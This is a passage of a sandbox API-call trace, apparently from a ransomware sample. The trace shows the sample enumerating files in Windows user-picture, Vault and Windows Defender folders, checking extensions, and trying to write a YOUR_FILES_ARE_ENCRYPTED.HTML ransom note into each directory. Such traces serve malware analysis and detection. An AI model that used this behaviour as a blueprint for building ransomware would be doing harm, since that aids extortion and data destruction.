lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.975] PathFindExtensionW (pszPath="usertile39.bmp") returned=".bmp" [0169.975] lstrlenW (lpString=".bmp") returned 4 [0169.975] PathFindExtensionW (pszPath="usertile39.bmp") returned=".bmp" [0169.975] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b8393e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52b8393e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf249a57c, 
ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile40.bmp", cAlternateFileName="")) returned 1 [0169.975] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned 86 [0169.976] lstrcmpW (lpString1="usertile40.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.976] PathFindExtensionW (pszPath="usertile40.bmp") returned=".bmp" [0169.976] lstrlenW (lpString=".bmp") returned 4 [0169.976] PathFindExtensionW (pszPath="usertile40.bmp") returned=".bmp" [0169.976] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ba9aa6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52ba9aa6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf249a57c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile41.bmp", cAlternateFileName="")) returned 1 [0169.976] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned 86 [0169.976] lstrcmpW (lpString1="usertile41.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.976] PathFindExtensionW (pszPath="usertile41.bmp") returned=".bmp" [0169.976] lstrlenW (lpString=".bmp") returned 4 [0169.976] PathFindExtensionW (pszPath="usertile41.bmp") returned=".bmp" [0169.976] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52bcfc0e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52bcfc0e, 
ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf257edbc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile42.bmp", cAlternateFileName="")) returned 1 [0169.976] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned 86 [0169.976] lstrcmpW (lpString1="usertile42.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.976] PathFindExtensionW (pszPath="usertile42.bmp") returned=".bmp" [0169.976] lstrlenW (lpString=".bmp") returned 4 [0169.976] PathFindExtensionW (pszPath="usertile42.bmp") returned=".bmp" [0169.976] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52bf5d76, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52bf5d76, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf25a4f1c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile43.bmp", cAlternateFileName="")) returned 1 [0169.976] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned 86 [0169.976] lstrcmpW (lpString1="usertile43.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.976] PathFindExtensionW (pszPath="usertile43.bmp") returned=".bmp" [0169.977] lstrlenW (lpString=".bmp") returned 4 [0169.977] PathFindExtensionW (pszPath="usertile43.bmp") returned=".bmp" [0169.977] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c1bede, 
ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52c1bede, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf25cb07c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 1 [0169.977] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned 86 [0169.977] lstrcmpW (lpString1="usertile44.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.977] PathFindExtensionW (pszPath="usertile44.bmp") returned=".bmp" [0169.977] lstrlenW (lpString=".bmp") returned 4 [0169.977] PathFindExtensionW (pszPath="usertile44.bmp") returned=".bmp" [0169.977] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf6a360, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf6a360, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf904c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.977] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0169.977] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.977] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf6a360, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf6a360, 
ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf904c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.977] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.977] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0169.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.977] GetProcessHeap () returned 0x270000 [0169.978] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.978] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x60, cFileName="guest.bmp", cAlternateFileName="")) returned 1 [0169.978] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp") returned 64 [0169.978] lstrcmpW (lpString1="guest.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.978] 
PathFindExtensionW (pszPath="guest.bmp") returned=".bmp" [0169.978] lstrlenW (lpString=".bmp") returned 4 [0169.979] PathFindExtensionW (pszPath="guest.bmp") returned=".bmp" [0169.979] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d7a1c3, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d7a1c3, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x60, cFileName="user.bmp", cAlternateFileName="")) returned 1 [0169.979] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp") returned 63 [0169.979] lstrcmpW (lpString1="user.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.979] PathFindExtensionW (pszPath="user.bmp") returned=".bmp" [0169.979] lstrlenW (lpString=".bmp") returned 4 [0169.979] PathFindExtensionW (pszPath="user.bmp") returned=".bmp" [0169.979] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf904c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf904c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc028a40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.979] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0169.979] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.979] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf904c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf904c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc028a40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.979] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.979] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0169.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.979] GetProcessHeap () returned 0x270000 [0169.980] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.980] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault") returned 38 [0169.980] GetProcessHeap () returned 0x270000 [0169.980] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.980] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault" [0169.980] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*" [0169.980] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcc028a40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc028a40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.982] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0169.982] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.982] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.982] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0169.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\vault\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.982] GetProcessHeap () returned 0x270000 [0169.983] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.983] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows 
Defender") returned 49 [0169.983] GetProcessHeap () returned 0x270000 [0169.983] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.983] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender" [0169.983] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*" [0169.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc0e7120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc0e7120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.984] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates") returned 68 [0169.984] GetProcessHeap () returned 0x270000 [0169.984] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.984] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates" [0169.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows 
Defender\\Definition Updates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*" [0169.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc074d00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc074d00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.984] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 75 [0169.984] GetProcessHeap () returned 0x270000 [0169.984] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.984] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0169.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*" [0169.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", 
lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc04eba0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc04eba0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.985] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0169.985] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.985] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.986] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0169.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\backup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.987] GetProcessHeap () returned 0x270000 [0169.988] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.988] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 76 [0169.988] GetProcessHeap () returned 0x270000 [0169.988] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.988] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0169.988] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*" [0169.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc074d00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc074d00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.988] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0169.988] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.988] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.988] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition 
Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0169.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\updates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.989] GetProcessHeap () returned 0x270000 [0169.989] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.990] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0169.990] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.990] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.990] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0169.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.990] GetProcessHeap () returned 0x270000 [0169.991] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.991] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Windows Defender\\LocalCopy") returned 59 [0169.991] GetProcessHeap () returned 0x270000 [0169.991] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.991] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy" [0169.991] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*" [0169.991] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x4ebd848 | out: 